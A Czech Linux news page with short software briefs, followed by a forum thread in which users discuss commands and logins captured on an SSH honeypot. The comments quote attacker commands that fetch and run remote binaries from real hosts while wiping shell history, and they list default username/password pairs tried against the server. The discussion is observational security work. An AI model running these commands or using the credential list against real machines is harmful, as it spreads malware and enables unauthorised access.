Czkawka a Krokiet, grafické aplikace pro hledání duplicitních a zbytečných souborů, byly vydány ve verzi 11.0. Podrobný přehled novinek v příspěvku na Medium. Od verze 7.0 je vedle frontendu Czkawka postaveného nad frameworkem GTK 4 vyvíjen nový frontend Krokiet postavený nad frameworkem Slint. Frontend Czkawka je už pouze v udržovacím módu. Novinky jsou implementovány ve frontendu Krokiet.
Jiří Eischmann na svém blogu publikoval článek Úvod do MeshCore: "Doteď mě radioamatérské vysílání úplně míjelo. Když jsem se ale dozvěděl, že existují komunity, které svépomocí budují bezdrátové sítě, které jsou nezávislé na Internetu a do značné míry taky elektrické síti a přes které můžete komunikovat s lidmi i na druhé straně republiky, zaujalo mě to. Když o tom přede mnou pořád básnili kolegové v práci, rozhodl jsem se, že to zkusím taky.
… více »Byla vydána verze 0.5.20 open source správce počítačových her na Linuxu Lutris (Wikipedie). Přehled novinek v oznámení na GitHubu. Instalovat lze také z Flathubu.
Peter Steinberger, autor open source AI asistenta OpenClaw, nastupuje do OpenAI. OpenClaw bude převeden pod nadaci a zůstane otevřený a nezávislý.
Společnost Backblaze zveřejnila statistiky spolehlivosti pevných disků používaných ve svých datových centrech za rok 2025. Ke konci roku 2025 vlastnila 349 462 pevných disků. Průměrná AFR (Annualized Failure Rate), tj. pravděpodobnost, že disk během roku selže, byla 1,36 %. V roce 2024 to bylo 1,57 %. V roce 2023 to bylo 1,70 %. V roce 2022 to bylo 1,37 %.
Nástroj sql-tap je proxy mezi aplikací a databází, které zachytává všechny SQL dotazy a zobrazuje je v terminálovém rozhraní. Zde lze téměř v reálném čase zkoumat dotazy, sledovat transakce a spouštět SQL příkaz EXPLAIN. Podporované databázové systémy jsou pouze PostgreSQL a MySQL. Zdrojový kód je dostupný na GitHubu, pod licencí MIT.
Byla vydána nová verze 9.2 textového editoru Vim (Vi IMproved). Přináší vylepšené doplňování, podporu schránky ve Waylandu, podporu XDG Base Directory (konfigurace v $HOME/.config/vim), vylepšené Vim9 skriptování nebo lepší zvýrazňování změn. Vim zůstává charityware. Nadále vybízí k podpoře dětí v Ugandě. Z důvodu úmrtí autora Vimu Brama Moolenaara a ukončení činnosti jím založené charitativní organizace ICCF Holland projekt Vim navázal spolupráci s charitativní organizaci Kuwasha.
Byl představen editor MonoSketch, webová aplikace pro tvorbu diagramů, technických nákresů, flowchartů a různých dalších vizualizací, to vše jenom z ASCII znaků. Všechny operace běží pouze v prohlížeči uživatele a neprobíhá tedy žádné nahrávání dat na server. Zdrojový kód aplikace (drtivá většina Kotlin, žádné C#) je dostupný na GitHubu pod licencí Apache 2.0.
Byla vydána nová verze 3.7.0 multiplatformního svobodného frameworku pro zpracování obrazu G'MIC (GREYC's Magic for Image Computing, Wikipedie). Přehled novinek i s náhledy nových filtrů na PIXLS.US.
Všem na AbcLinuxu vše nejlepší k Valentýnu aneb Dni lásky ke svobodnému softwaru (I love Free Software Day, Mastodon, 𝕏).
13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ /bin/busybox cp; /gweerwe323f 13:26:38 $ 13:26:38 $ mount ;/gweerwe323f 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; cat /tmp/.nippon; rm -f /tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; cat /var/tmp/.nippon; rm -f /var/tmp/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/' > //.nippon; cat //.nippon; rm -f //.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/lib/init/rw' > /lib/init/rw/.nippon; cat /lib/init/rw/.nippon; rm -f /lib/init/rw/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; cat /proc/.nippon; rm -f /proc/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; cat /sys/.nippon; rm -f /sys/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; cat /dev/.nippon; rm -f /dev/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/shm' > /dev/shm/.nippon; cat /dev/shm/.nippon; rm -f /dev/shm/.nippon 13:26:38 $ 13:26:38 $ echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; cat /dev/pts/.nippon; rm -f /dev/pts/.nippon 13:26:38 $ 13:26:38 $ /gweerwe323f 13:26:38 $ 13:26:38 $ cat /bin/echo ;/gweerwe323f 13:26:38 $A takto vypada datum, cas, geolokace IP, IP, pocet sezeni, username, password:
2018-03-08 14:05:42 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:40 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:39 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 14:05:38 FRA - 51.254.121.56 1 admin admin@123 2018-03-08 13:26:37 185.234.218.242 30 admin motorola 2018-03-08 12:59:30 POL - 188.125.43.186 1 ethos live 2018-03-08 12:59:29 POL - 188.125.43.186 1 root live 2018-03-08 11:08:51 185.234.218.242 32 root 1234 2018-03-08 10:19:06 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 10:19:05 USA - 192.200.218.166 1 root zxc123$ 2018-03-08 01:53:05 185.234.218.242 30 admin admin1 2018-03-08 00:59:23 185.234.218.242 30 user user 2018-03-07 23:28:07 185.234.218.242 0 usuario usuario 2018-03-07 20:33:47 185.234.218.242 32 root 12345 2018-03-07 19:50:26 185.234.218.242 32 root ubnt 2018-03-07 19:23:26 USA - 192.200.218.166 1 root 12345 2018-03-07 19:23:24 USA - 192.200.218.166 1 root 12345 2018-03-07 19:20:49 185.234.218.242 30 admin default 2018-03-07 19:00:22 185.234.218.242 32 root password 2018-03-07 16:45:31 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:29 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:28 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:27 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 16:45:26 FRA - 51.254.47.198 1 postgres postgres 2018-03-07 15:41:13 185.234.218.242 32 root xmhdipc 2018-03-07 13:53:48 185.234.218.242 30 admin password 2018-03-07 13:42:02 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 13:42:01 USA - 192.200.218.166 1 root 0p9o8t 2018-03-07 10:03:00 185.234.218.242 0 service service 2018-03-07 09:39:09 185.234.218.242 30 admin pfsense 2018-03-07 09:15:53 USA - 173.14.84.113 2 pi raspberry 2018-03-07 09:15:52 USA - 173.14.84.113 2 pi raspberryraspberry993311 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberry 2018-03-07 09:15:50 USA - 173.14.84.113 1 pi raspberryraspberry993311 2018-03-07 09:11:44 185.234.218.242 30 admin default 2018-03-07 08:50:22 185.234.218.242 32 root 123456 2018-03-07 08:04:05 185.234.218.242 32 root uClinux 2018-03-07 07:40:28 185.234.218.242 32 root 111111 2018-03-06 22:19:23 KOR - 119.192.239.192 1 ethos live 2018-03-06 22:19:19 KOR - 119.192.239.192 1 root live 2018-03-06 19:58:08 JPN - 118.241.240.233 2 pi raspberryraspberry993311 2018-03-06 19:58:07 JPN - 118.241.240.233 2 pi raspberry 2018-03-06 19:58:03 JPN - 118.241.240.233 1 pi raspberryraspberry993311 2018-03-06 19:58:02 JPN - 118.241.240.233 1 pi raspberry 2018-03-04 21:30:50 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:37 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:26 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:13 CHN - 222.186.172.48 1 root root 2018-03-04 21:30:01 CHN - 222.186.172.48 1 root root
.nippon? To je honeypot test na permissions?
$ rm -f /tmp/run;if [ `getconf LONG_BIT` -eq 64 ];then u="http://www.bizqsoft.com/tp2/r6.log";else u="http://www.bizqsoft.com/tp2/r.log";fi;(wget -O /tmp/run $u || curl -o /tmp/run $u || python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')");echo > ~/.bash_history;chmod 0777 /tmp/run && /tmp/run;rm -rf /tmp/run
/gweerwe323f. Jinak do toho nipponu se zapisuje "Grop" jako ascii, google napoví. Já bych teda zkoušel něco jako .bash_history sice poutá víc pozornosti (teda pokud uživatel vypisuje i tečkový hidden soubory), ale dá se zase ospravedlnit bugem s $HOME. Vypadá to že to je prostě jen test oprávnění. Ony embedded systémy často můžou bejt readonly.
) a stažení nějakého ddos skritpu a jeho spuštění. Toto se mi děje často jako přes kopírák.
<trolling>
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec medu kdy se prihlasi na server a zadavaji ruzne prikazy. Tyto jsou pak zaznamenany zrovnatak jako uzivatelska jmena, hesla a lze si pocist co se hackerovi/robotovi honi hlavou. Toto je docela zajimava vec.
A jestlipak od těch nebožáků máš souhlas se zpracováním osobních údajů v souladu s GDPR? :-D
</trolling>
/etc/motd za nějaký legal banner podobně jako to už nějakou dobu musí dělat v usa.
.
Jiz nejakou dobu se zabyvam ze zvedavosti sledovanim utocniku na SSH lakanych na tzv. hrnec meduToto je hyenismus nejhrubšího zrna. Ti lidé nejsou žádní útočníci, ale běženci!!! Ve své zemi nemají dostatek serverů, na kterých by se mohli realizovat, a tak hledají útočiště u nás. Proč automaticky předpokládáte, že vám chtějí škodit?? Místo, abyste se choval jako obyčejný xenofob a nácek, byste jim měl pomoci, podělit se o svůj nadbytek a poskytnout jim prostor na svém serveru. Oni vám vůbec škodit nemusí - a můžou vám naopak třeba obohatit operační systém nějakým skriptem nebo binárkou, ze kterých se něco naučíte, nebo které můžete sám používat. Nebo díky nim získáte kontakty na jiné servery, na které se jde připojit... Třeba taky jednou budete potřebovat pomoc, tak na to myslete, než se příště budete chovat zase takhle sobecky.
$ #!/bin/sh PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://199.231.68.230/ys808e curl -O http://199.231.68.230/ys808e chmod +x ys808e ./ys808eVirustotal rika toto
Tiskni
Sdílej: